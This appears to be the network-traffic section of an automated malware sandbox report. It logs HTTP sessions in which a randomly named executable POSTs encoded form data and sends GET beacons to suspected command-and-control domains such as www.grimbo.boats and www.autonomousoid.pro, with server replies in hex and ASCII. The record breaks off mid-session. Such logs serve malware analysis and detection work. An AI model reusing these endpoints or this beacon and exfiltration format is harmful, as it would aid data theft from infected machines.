                                                          19192.168.2.949994172.67.182.198805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:17.512401104 CET1782OUTPOST /nuxf/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.grimbo.boats
                                                          Referer: http://www.grimbo.boats/nuxf/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 33 59 47 70 33 47 30 64 6e 50 34 4b 4f 30 7a 65 4e 6d 78 6c 32 4e 54 57 6d 2b 69 59 2f 4b 78 34 6d 4c 35 67 66 4d 51 32 43 36 6f 31 63 5a 75 65 2b 49 54 43 52 70 6d 30 67 73 54 52 56 56 52 4c 43 54 48 5a 30 74 64 46 49 4e 74 35 75 50 78 42 6d 32 59 63 44 6c 4d 52 47 73 46 49 56 5a 59 55 37 6a 44 52 41 71 4b 58 74 2f 62 52 6f 55 66 74 56 69 61 64 62 43 51 61 46 31 38 5a 50 77 58 58 33 32 63 68 4b 51 32 33 69 6d 45 53 59 47 44 42 78 41 30 54 51 66 6b 79 78 65 35 38 34 59 38 38 53 47 6b 70 6c 66 5a 37 4b 43 4e 6b 6a 6f 32 6f 57 4a 49 4f 72 53 79 56 66 6d 51 34 73 4c 77 47 31 76 75 34 52 4a 6e 4f 6e 30 39 37 64 35 37 68 36 76 2f 42 77 62 6d 63 62 2b 2f 35 47 74 72 2f 33 74 75 2b 66 78 4d 65 54 35 41 43 4d 4b 32 59 66 66 47 47 54 6f 5a 55 38 4e 45 62 58 50 4a 56 44 5a 6a 39 42 2b 75 78 36 7a 76 4c 49 51 62 33 61 61 35 70 36 6d 6c 51 63 52 66 37 32 50 33 42 57 78 56 61 56 68 72 69 51 6b 66 49 39 63 54 53 79 77 4b 2b 6b 39 77 56 43 64 67 48 48 71 75 6f 50 36 39 44 4d 73 62 30 47 30 [TRUNCATED]
                                                          Data Ascii: bdi02je=3YGp3G0dnP4KO0zeNmxl2NTWm+iY/Kx4mL5gfMQ2C6o1cZue+ITCRpm0gsTRVVRLCTHZ0tdFINt5uPxBm2YcDlMRGsFIVZYU7jDRAqKXt/bRoUftViadbCQaF18ZPwXX32chKQ23imESYGDBxA0TQfkyxe584Y88SGkplfZ7KCNkjo2oWJIOrSyVfmQ4sLwG1vu4RJnOn097d57h6v/Bwbmcb+/5Gtr/3tu+fxMeT5ACMK2YffGGToZU8NEbXPJVDZj9B+ux6zvLIQb3aa5p6mlQcRf72P3BWxVaVhriQkfI9cTSywK+k9wVCdgHHquoP69DMsb0G0D4Rvkp07ZYRmmCORYYYsDXXWqnk5PCPJEBJ1d1nEzXP5rYfbY6yirmM2kCZyYpy2ZiI1wRJQpkSmTNrimEIA4DBGrUeUg9EUc0hrVPFz6IH4kv8HRTNh1Bq2B35emQJKucklyr9bldGP51npt2tX8Ht3TcRA7L9dIwcx5qrUe1R80nIL2zWQwCjY5knaAVxs2bBI9GXChGFj/knHPNGzQzZETXBkbA2K9s7Mi1HpsWmdHWwCq9jIy9A14zidFTsPPjvtoex9leSvq+SBultJILIOuj2AjeS+QI3VEa7+hzfBpvTN/cjrBpNmkp09SpzwOSLxQjqLUFs1fw//PbjKf76sy6gmPK7kiQng91uIM/C3Sud6X6U3TqRJivfhVeROuh4kXOCNAkzXff4CbPi97NjsJIzC8oFOuOsXsQ2wv8Et72fiziy8kRJ+akf/KUpgZ6MemYgDriPrQnI6/zAFLjyDgulhFFH6tfYcLZP0XeMfCeY+SkrTPn27w3y9SWWYnwe+5LPsTWxQOL1AcPI5k5M1ek0V/D/bdXzE+23gg+DoHWX2XISs90PZabz2EcLJbxqsye9QT9jILDm7MKJQmPaPb0POj9NnYsGf+roGwscJgEUDkdgcMUs6zkGIGNFrBMdPN8QpZuFoyAvJ1iMvDDIXJO/JjIm0Jx [TRUNCATED]
                                                          Jan 10, 2025 23:07:18.140299082 CET1082INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:18 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1LSCZap%2FjfVFRruKFfIcsziXKxf8KQLeO3oq8aVtRLmrjYpXDytdI7L4CtK5SJSXcJKHoRGpRhYPishLadCFnzA4PVTOKxluGC9vOlp4RdrwBwVijC5EGT1eOSS7D7M%2B2su"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffffaa8dde9435d-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.949995172.67.182.198805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:20.059042931 CET481OUTGET /nuxf/?bdi02je=6auJ0yMi6OdsOmW1PnEOwtKK+9KMlfd7htFlcJBIKY8nc6XduaXwfvOOo77xMmoGODzG8ol9XftCv+9phUBaDXIrAZJse5hp6wCZHpS5iNqkumbbXg==&dZOh=OjIxv4 HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.grimbo.boats
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:20.696115971 CET1099INHTTP/1.1 404 Not Found
                                                          Date: Fri, 10 Jan 2025 22:07:20 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          vary: accept-encoding
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0MsLdmLG8BZIyoU6j1qYC4H4H3iGusq%2F58Lh1WJVIyKQauJ9tyfOBHs8gcEADZwY5B%2FJJhT71X4BT05V68wfeP9CEhaEkts6mpwCLJ%2BlhP813Vf3eLMeFMeQrAc0eWMth1t"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ffffab8e9b742f4-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=481&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.94999613.248.169.48805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:25.765160084 CET760OUTPOST /m1if/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.autonomousoid.pro
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.autonomousoid.pro
                                                          Referer: http://www.autonomousoid.pro/m1if/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 73 67 71 49 4f 30 33 45 61 6c 79 49 76 4e 50 4e 35 38 43 45 58 48 6f 4e 34 73 51 34 6b 68 58 39 33 66 45 4f 67 43 45 52 47 71 35 64 63 36 38 7a 69 4c 79 78 58 32 72 2f 49 53 73 52 6a 62 61 4f 51 54 4a 37 6c 55 67 58 65 42 69 57 33 41 6a 66 6c 45 70 68 36 62 54 4b 6e 77 58 5a 4c 33 6d 70 53 54 70 34 6a 7a 66 59 67 65 44 72 6d 4d 71 4a 63 2b 48 71 38 6a 41 39 56 51 65 67 2b 58 68 49 35 32 38 74 44 2b 75 4e 33 4b 37 6a 71 64 56 51 61 63 7a 35 35 35 34 54 71 51 41 54 56 5a 46 72 50 4e 4f 65 51 68 43 50 77 41 4b 50 50 56 35 45 51 31 63 54 2b 32 67 37 32 6a 2f 2b
                                                          Data Ascii: bdi02je=sgqIO03EalyIvNPN58CEXHoN4sQ4khX93fEOgCERGq5dc68ziLyxX2r/ISsRjbaOQTJ7lUgXeBiW3AjflEph6bTKnwXZL3mpSTp4jzfYgeDrmMqJc+Hq8jA9VQeg+XhI528tD+uN3K7jqdVQacz5554TqQATVZFrPNOeQhCPwAKPPV5EQ1cT+2g72j/+
                                                          Jan 10, 2025 23:07:26.218266010 CET73INHTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.94999713.248.169.48805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:28.314491987 CET784OUTPOST /m1if/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.autonomousoid.pro
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 220
                                                          Origin: http://www.autonomousoid.pro
                                                          Referer: http://www.autonomousoid.pro/m1if/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 73 67 71 49 4f 30 33 45 61 6c 79 49 75 76 62 4e 32 37 57 45 41 58 6f 4b 39 73 51 34 74 42 58 35 33 66 59 4f 67 48 6b 42 48 5a 64 64 63 59 6b 7a 77 35 4b 78 55 32 72 2f 44 79 73 59 2b 72 61 56 51 54 46 5a 6c 55 73 58 65 42 32 57 33 42 54 66 6c 7a 39 6d 36 4c 54 4d 79 67 58 68 56 48 6d 70 53 54 70 34 6a 79 37 79 67 65 37 72 6e 2f 79 4a 63 66 48 72 78 44 41 2b 53 51 65 67 36 58 68 4d 35 32 39 49 44 2f 43 72 33 50 6e 6a 71 64 6c 51 61 4f 62 36 77 35 34 56 30 67 42 55 46 72 78 6b 42 50 2b 43 59 77 54 73 6b 77 65 73 49 30 46 61 42 48 56 49 72 68 67 63 78 45 32 57 35 79 32 6b 68 68 39 32 43 53 6f 6a 43 34 33 34 33 44 6b 55 30 67 3d 3d
                                                          Data Ascii: bdi02je=sgqIO03EalyIuvbN27WEAXoK9sQ4tBX53fYOgHkBHZddcYkzw5KxU2r/DysY+raVQTFZlUsXeB2W3BTflz9m6LTMygXhVHmpSTp4jy7yge7rn/yJcfHrxDA+SQeg6XhM529ID/Cr3PnjqdlQaOb6w54V0gBUFrxkBP+CYwTskwesI0FaBHVIrhgcxE2W5y2khh92CSojC4343DkU0g==
                                                          Jan 10, 2025 23:07:28.758781910 CET73INHTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.94999813.248.169.48805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:30.861717939 CET1797OUTPOST /m1if/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.autonomousoid.pro
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1232
                                                          Origin: http://www.autonomousoid.pro
                                                          Referer: http://www.autonomousoid.pro/m1if/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 73 67 71 49 4f 30 33 45 61 6c 79 49 75 76 62 4e 32 37 57 45 41 58 6f 4b 39 73 51 34 74 42 58 35 33 66 59 4f 67 48 6b 42 48 5a 56 64 63 70 45 7a 69 75 6d 78 56 32 72 2f 64 43 73 64 2b 72 61 59 51 54 64 64 6c 55 78 67 65 43 4f 57 32 6d 37 66 6a 47 42 6d 6a 37 54 4d 77 67 58 61 4c 33 6e 70 53 58 4e 38 6a 7a 4c 79 67 65 37 72 6e 35 32 4a 65 4f 48 72 7a 44 41 39 56 51 66 30 2b 58 68 6b 35 79 52 79 44 2f 32 64 32 37 72 6a 70 39 31 51 63 39 7a 36 2f 35 34 58 31 67 42 32 46 72 73 6b 42 50 69 6b 59 77 32 4a 6b 79 65 73 49 77 77 64 53 30 5a 52 35 79 77 51 32 6b 2b 71 31 79 2f 59 72 52 59 2f 55 51 59 46 56 34 6d 71 39 44 74 77 32 68 58 57 71 2b 61 50 2f 30 42 6a 47 35 31 32 6c 65 37 66 78 4b 72 6b 37 4d 78 58 71 54 52 51 4f 45 2f 4e 5a 74 6d 35 4c 53 78 7a 75 5a 4e 59 2f 38 36 4e 49 2b 73 4b 5a 59 33 57 33 56 79 51 44 51 2f 41 78 43 2f 53 68 4d 46 7a 30 33 79 36 56 59 76 6b 4e 63 34 77 58 4c 54 2b 77 38 57 4c 53 53 41 56 62 56 2f 4e 72 70 37 54 45 68 51 41 30 37 43 48 79 2f 67 68 78 70 [TRUNCATED]
                                                          Data Ascii: bdi02je=sgqIO03EalyIuvbN27WEAXoK9sQ4tBX53fYOgHkBHZVdcpEziumxV2r/dCsd+raYQTddlUxgeCOW2m7fjGBmj7TMwgXaL3npSXN8jzLyge7rn52JeOHrzDA9VQf0+Xhk5yRyD/2d27rjp91Qc9z6/54X1gB2FrskBPikYw2JkyesIwwdS0ZR5ywQ2k+q1y/YrRY/UQYFV4mq9Dtw2hXWq+aP/0BjG512le7fxKrk7MxXqTRQOE/NZtm5LSxzuZNY/86NI+sKZY3W3VyQDQ/AxC/ShMFz03y6VYvkNc4wXLT+w8WLSSAVbV/Nrp7TEhQA07CHy/ghxpA/peiaiVQY3k0OwTCoSWUFQEe9j22/ZwzQ6gHE0tlA2enc7tqVcbkD8KgjATtYV0JI7E4NlImDCPisZl+2YQhp5TCzIBH6bMQSmikuY8mLfFWtwQVIVnjyOsmytKIow4UAkkWlJFG3q3OheM5EX+xWRhi/cobskCtc1gZwvONx5ycYfB7bTX8YcsTJ7nmpIqYntoOhVF7R19xvCK1p83tqKOBWPOYiKjjr2BMP3zxjuFq53sm/mNZfVq8VXo55zHI9W31IhS2cRCCopw+aORrg4lr8iL2/sKuSoYW3dNY1I2oniCPkMSc7v4iO6buXgeQ5MF+UFdULs/oRUzuBqqMncggQEIxxXVXSUriuRguKK4XHMm7mHzXZ4R4DLkaePrSRrVZCKzQE5z9p68a2oy2bLDSa4U1yKXSbBQ4Im5ZCuKWILBfPIGtX6oRedpVkSNtagJirt4JqU5OH0Qa4H/NICT9mauxy0K0GN2g3iGsKGvQz6t1c3Ak94QY2mQlQgyRXIDeBiD5MRTonpYIs4xImFMLiAyyxV0KmVjIoBKAHVcADKjFeJ1WtO4+Kpj35SfyY+FooFnDuX0kGOwfN92KAjZMZ4wsnGQ+g6222ea1qPhRGkJ8LvvfcusGlu4oUUmNK4fYbUBKjvZ83jZd2luQHxtZK+4/VA20Y [TRUNCATED]
                                                          Jan 10, 2025 23:07:31.325613022 CET73INHTTP/1.1 405 Method Not Allowed
                                                          content-length: 0
                                                          connection: close


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.94999913.248.169.48805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:33.403079987 CET486OUTGET /m1if/?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw== HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Host: www.autonomousoid.pro
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Jan 10, 2025 23:07:33.879479885 CET372INHTTP/1.1 200 OK
                                                          content-type: text/html
                                                          date: Fri, 10 Jan 2025 22:07:33 GMT
                                                          content-length: 251
                                                          connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 64 5a 4f 68 3d 4f 6a 49 78 76 34 26 62 64 69 30 32 6a 65 3d 68 69 43 6f 4e 45 57 47 4c 43 2b 59 67 2b 7a 48 35 71 79 44 4a 53 38 54 71 2b 39 56 30 6c 6a 50 79 4f 4e 75 7a 33 70 2b 4b 71 74 6c 55 4a 74 6b 6c 61 61 78 58 44 66 74 4f 69 51 39 6a 4a 66 58 65 45 78 69 6b 41 39 59 41 41 43 6c 2f 79 62 63 72 6e 52 77 69 4b 4c 52 35 6b 6e 75 43 48 57 71 56 47 45 53 71 69 76 42 6d 5a 62 54 69 4f 6d 43 50 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw=="}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.950000160.25.166.123805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:39.399435043 CET733OUTPOST /74m3/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US,en;q=0.5
                                                          Accept-Encoding: gzip, deflate, br
                                                          Host: www.rpa.asia
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 196
                                                          Origin: http://www.rpa.asia
                                                          Referer: http://www.rpa.asia/74m3/
                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
                                                          Data Raw: 62 64 69 30 32 6a 65 3d 45 32 54 33 56 75 47 38 49 6d 43 31 53 63 30 49 76 66 6c 43 72 35 56 30 6a 33 4f 64 5a 78 42 78 74 44 68 78 2f 37 6e 31 32 33 78 68 6b 47 32 35 43 69 4e 64 32 71 6c 59 55 39 71 59 66 45 30 30 42 35 39 39 64 50 78 30 61 52 57 51 56 33 76 2f 72 73 56 45 2b 56 59 41 4a 48 71 47 43 52 4b 4e 6d 73 46 35 47 77 6a 55 75 59 37 39 56 4f 43 74 2f 50 75 58 43 69 55 53 34 43 34 35 61 55 41 6c 62 65 7a 42 72 46 52 77 49 72 67 53 57 6d 53 71 74 54 4a 6e 6a 45 66 43 56 55 38 77 31 75 73 59 5a 4c 47 48 74 34 52 68 45 69 68 51 54 2b 43 79 37 6d 50 42 7a 69 69 4e 45 44 67 2f
                                                          Data Ascii: bdi02je=E2T3VuG8ImC1Sc0IvflCr5V0j3OdZxBxtDhx/7n123xhkG25CiNd2qlYU9qYfE00B599dPx0aRWQV3v/rsVE+VYAJHqGCRKNmsF5GwjUuY79VOCt/PuXCiUS4C45aUAlbezBrFRwIrgSWmSqtTJnjEfCVU8w1usYZLGHt4RhEihQT+Cy7mPBziiNEDg/
                                                          Jan 10, 2025 23:07:40.376097918 CET1236INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Fri, 10 Jan 2025 22:07:40 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Jan 10, 2025 23:07:40.376245975 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          26192.168.2.950001160.25.166.123805636C:\Program Files (x86)\TqOIjzlGuzlPmlMUjBMtDbBhzEhyvWKDnuieBBrxZOUjgjZsRr\YLmLMhEKNXTfg.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 10, 2025 23:07:41.951749086 CET757OUTPOST /74m3/ HTTP/1.1
